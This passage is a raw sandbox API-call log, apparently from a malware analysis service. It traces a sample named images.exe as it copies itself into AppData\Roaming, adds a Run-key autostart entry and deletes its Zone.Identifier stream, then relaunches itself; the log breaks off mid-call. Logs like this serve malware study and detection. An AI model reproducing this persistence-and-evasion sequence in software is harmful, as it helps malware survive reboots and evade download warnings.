HALPmcxz\\AppData\\Local") returned 0x0 [0176.318] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0176.318] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 0 [0176.320] GetProcessHeap () returned 0x620000 [0176.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d0) returned 0x64de40 [0176.320] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x64de40, nSize=0x3e8 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0176.320] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0176.320] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0176.320] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0176.320] lstrcpyW (in: lpString1=0x2ca0000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0176.320] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0176.320] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2cb0000 [0176.320] lstrcpyW (in: lpString1=0x2cb0000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0176.320] VirtualFree (lpAddress=0x2ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.321] GetProcessHeap () returned 0x620000 [0176.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa) returned 0x647a10 [0176.321] lstrlenA (lpString="r.H.fFJGr") returned 9 [0176.321] lstrlenA (lpString="r.H.fFJGr") returned 9 [0176.321] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0176.321] lstrcpyA (in: lpString1=0x2ca0000, lpString2="r.H.fFJGr" | out: lpString1="r.H.fFJGr") returned="r.H.fFJGr" [0176.321] lstrlenA (lpString="r.H.fFJGr") returned 9 [0176.321] lstrlenA (lpString="r.H.fFJGr") returned 9 [0176.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2ca0000, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0176.321] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2cc0000 [0176.322] lstrlenA (lpString="r.H.fFJGr") returned 9 [0176.322] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2ca0000, cbMultiByte=-1, lpWideCharStr=0x2cc0000, cchWideChar=22 | out: lpWideCharStr="r.H.fFJGr") returned 10 [0176.322] lstrlenW (lpString="r.H.fFJGr") returned 9 [0176.322] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0176.322] lstrlenW (lpString="r.H.fFJGr") returned 9 [0176.322] lstrcpyW (in: lpString1=0x2cd0000, lpString2="r.H.fFJGr" | out: lpString1="r.H.fFJGr") returned="r.H.fFJGr" [0176.322] lstrlenW (lpString="r.H.fFJGr") returned 9 [0176.322] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0176.322] lstrcpyW (in: lpString1=0x2ce0000, lpString2="r.H.fFJGr" | out: lpString1="r.H.fFJGr") returned="r.H.fFJGr" [0176.322] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.323] VirtualFree (lpAddress=0x2cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.323] lstrlenW (lpString="r.H.fFJGr") returned 9 [0176.323] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2cc0000 [0176.323] lstrcatW (in: lpString1="", lpString2="r.H.fFJGr" | out: lpString1="r.H.fFJGr") returned="r.H.fFJGr" [0176.323] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.323] VirtualFree (lpAddress=0x2ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.324] GetProcessHeap () returned 0x620000 [0176.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x647a10 | out: hHeap=0x620000) returned 1 [0176.324] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ", Reserved=0x0, lpClass=0x0, dwOptions=0x1, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x2af950, lpdwDisposition=0x2af864 | out: phkResult=0x2af950*=0x1d0, lpdwDisposition=0x2af864*=0x1) returned 0x0 [0176.324] RegCloseKey (hKey=0x1d0) returned 0x0 [0176.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2af670, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0176.326] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0176.326] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0176.326] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0176.326] lstrcpyW (in: lpString1=0x2ca0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0176.326] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0176.326] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0176.327] lstrcpyW (in: lpString1=0x2cd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0176.327] VirtualFree (lpAddress=0x2ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.327] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming"), psa=0x0) returned 183 [0176.327] lstrlenW (lpString="images.exe") returned 10 [0176.327] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0176.327] lstrcpyW (in: lpString1=0x2ca0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0176.327] lstrlenW (lpString="\\") returned 1 [0176.327] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0176.328] lstrlenW (lpString="\\") returned 1 [0176.328] lstrcpyW (in: lpString1=0x2ce0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0176.328] lstrlenW (lpString="\\") returned 1 [0176.328] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0176.328] VirtualQuery (in: lpAddress=0x2cd0000, lpBuffer=0x2af81c, dwLength=0x1c | out: lpBuffer=0x2af81c*(BaseAddress=0x2cd0000, AllocationBase=0x2cd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.328] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0176.328] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.328] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0176.328] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.329] lstrlenW (lpString="images.exe") returned 10 [0176.329] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0176.329] VirtualQuery (in: lpAddress=0x2cf0000, lpBuffer=0x2af82c, dwLength=0x1c | out: lpBuffer=0x2af82c*(BaseAddress=0x2cf0000, AllocationBase=0x2cf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.329] VirtualAlloc (lpAddress=0x0, dwSize=0x74, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0176.329] VirtualFree (lpAddress=0x2cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.329] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="images.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" [0176.329] VirtualFree (lpAddress=0x2ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.330] CopyFileW (lpExistingFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe"), bFailIfExists=0) returned 1 [0176.366] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0176.366] GetProcessHeap () returned 0x620000 [0176.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x62fff8 [0176.366] GetProcessHeap () returned 0x620000 [0176.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x64e630 [0176.366] GetProcessHeap () returned 0x620000 [0176.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x62fef8 [0176.366] GetProcessHeap () returned 0x620000 [0176.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x6300f8 [0176.366] GetProcessHeap () returned 0x620000 [0176.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62fef8 | out: hHeap=0x620000) returned 1 [0176.366] GetProcessHeap () returned 0x620000 [0176.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e630 | out: hHeap=0x620000) returned 1 [0176.366] GetProcessHeap () returned 0x620000 [0176.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62fff8 | out: hHeap=0x620000) returned 1 [0176.366] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2af950 | out: phkResult=0x2af950*=0x1c8) returned 0x0 [0176.366] RegSetValueExW (in: hKey=0x1c8, lpValueName="inst", Reserved=0x0, dwType=0x3, lpData=0x6300f8*, cbData=0x72 | out: lpData=0x6300f8*) returned 0x0 [0176.367] GetProcessHeap () returned 0x620000 [0176.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6300f8 | out: hHeap=0x620000) returned 1 [0176.367] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", ulOptions=0x0, samDesired=0x20006, phkResult=0x2af954 | out: phkResult=0x2af954*=0x1d0) returned 0x0 [0176.367] lstrlenW (lpString="Images") returned 6 [0176.367] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0176.367] lstrcpyW (in: lpString1=0x2ca0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0176.367] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0176.367] GetProcessHeap () returned 0x620000 [0176.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x6300f8 [0176.367] RegSetValueExW (in: hKey=0x1d0, lpValueName="Images", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", cbData=0x72 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 0x0 [0176.369] VirtualFree (lpAddress=0x2ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.369] GetProcessHeap () returned 0x620000 [0176.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6300f8 | out: hHeap=0x620000) returned 1 [0176.369] RegCloseKey (hKey=0x1d0) returned 0x0 [0176.369] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0176.369] VirtualAlloc (lpAddress=0x0, dwSize=0x72, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0176.370] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0176.370] lstrcpyW (in: lpString1=0x2ca0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" [0176.370] lstrlenW (lpString=":Zone.Identifier") returned 16 [0176.370] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0176.370] lstrlenW (lpString=":Zone.Identifier") returned 16 [0176.370] lstrcpyW (in: lpString1=0x2ce0000, lpString2=":Zone.Identifier" | out: lpString1=":Zone.Identifier") returned=":Zone.Identifier" [0176.370] lstrlenW (lpString=":Zone.Identifier") returned 16 [0176.370] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0176.370] VirtualQuery (in: lpAddress=0x2ca0000, lpBuffer=0x2af82c, dwLength=0x1c | out: lpBuffer=0x2af82c*(BaseAddress=0x2ca0000, AllocationBase=0x2ca0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.370] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0176.370] VirtualFree (lpAddress=0x2ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.371] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpString2=":Zone.Identifier" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe:Zone.Identifier") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe:Zone.Identifier" [0176.371] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.371] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe:Zone.Identifier" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe:zone.identifier")) returned 0 [0176.371] VirtualFree (lpAddress=0x2cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.371] VirtualFree (lpAddress=0x2cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.372] VirtualFree (lpAddress=0x2cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0176.372] VirtualAlloc (lpAddress=0x0, dwSize=0x72, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0176.372] lstrcpyW (in: lpString1=0x2ca0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" [0176.372] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2af868*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af8ac | out: lpCommandLine=0x0, lpProcessInformation=0x2af8ac*(hProcess=0x1d4, hThread=0x1d0, dwProcessId=0x718, dwThreadId=0x5a0)) returned 1 [0176.400] VirtualFree (lpAddress=0x2ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.400] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.400] VirtualFree (lpAddress=0x2c80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.401] GetProcessHeap () returned 0x620000 [0176.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64d8b0 | out: hHeap=0x620000) returned 1 [0176.401] VirtualFree (lpAddress=0x2c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.401] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.401] VirtualFree (lpAddress=0x2c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.401] VirtualFree (lpAddress=0x2c50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.401] VirtualFree (lpAddress=0x1370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.402] GetProcessHeap () returned 0x620000 [0176.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64d870 | out: hHeap=0x620000) returned 1 [0176.402] WSACleanup () returned 0 [0176.402] ReleaseMutex (hMutex=0x1c0) returned 0 [0176.402] CloseHandle (hObject=0x1c0) returned 1 [0176.402] VirtualFree (lpAddress=0x1320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.402] RegCloseKey (hKey=0x1c8) returned 0x0 [0176.402] GetProcessHeap () returned 0x620000 [0176.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64d668 | out: hHeap=0x620000) returned 1 [0176.402] VirtualFree (lpAddress=0x1310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.402] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.402] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.403] VirtualFree (lpAddress=0x12f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.403] VirtualFree (lpAddress=0x610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.403] GetProcessHeap () returned 0x620000 [0176.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64d628 | out: hHeap=0x620000) returned 1 [0176.403] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.403] VirtualFree (lpAddress=0x1350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.404] VirtualFree (lpAddress=0x1330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.404] VirtualFree (lpAddress=0x1360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.404] VirtualFree (lpAddress=0x1340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.404] GetProcessHeap () returned 0x620000 [0176.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dc38 | out: hHeap=0x620000) returned 1 [0176.404] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.405] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.405] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.405] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.405] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.406] GetProcessHeap () returned 0x620000 [0176.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x659de8 | out: hHeap=0x620000) returned 1 [0176.483] CoUninitialize () [0176.533] CoUninitialize () [0176.578] VirtualFree (lpAddress=0x63e690, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.578] VirtualFree (lpAddress=0x63e6e8, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.578] ReleaseMutex (hMutex=0xb8) returned 0 [0176.578] CloseHandle (hObject=0xb8) returned 1 [0176.578] VirtualFree (lpAddress=0x2c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.579] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.579] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.579] VirtualFree (lpAddress=0x190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.579] VirtualFree (lpAddress=0x170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.579] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.589] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.590] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.655] ReleaseMutex (hMutex=0x198) returned 0 [0176.655] CloseHandle (hObject=0x198) returned 1 [0176.655] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.655] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.655] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.655] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.655] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.655] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.655] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.733] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.733] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.734] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.734] VirtualFree (lpAddress=0x320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.734] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.734] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.759] WSACleanup () returned 0 [0176.760] ReleaseMutex (hMutex=0x1b4) returned 0 [0176.760] CloseHandle (hObject=0x1b4) returned 1 [0176.760] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.760] WSACleanup () returned 0 [0176.858] ReleaseMutex (hMutex=0x19c) returned 0 [0176.858] CloseHandle (hObject=0x19c) returned 1 [0176.858] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.858] ReleaseMutex (hMutex=0x1b8) returned 0 [0176.858] CloseHandle (hObject=0x1b8) returned 1 [0176.858] ExitProcess (uExitCode=0x0) Process: id = "16" image_name = "images.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe" page_root = "0x6ab56000" os_pid = "0x718" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x6e0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 169 os_tid = 0x5a0 [0177.098] StrCmpW (psz1="APPDOMAIN_ID", psz2="APPBASE") returned 1 [0177.153] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0177.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x52ea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0177.579] IsAppThemed () returned 0x1 [0177.581] CoTaskMemAlloc (cb=0xf0) returned 0x383608 [0177.581] CreateActCtxA (pActCtx=0x52ef28) returned 0x3837fc [0177.583] CoTaskMemFree (pv=0x383608) [0177.589] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0177.589] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc11f [0177.843] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e8cc, lpFilePart=0x0 | out: 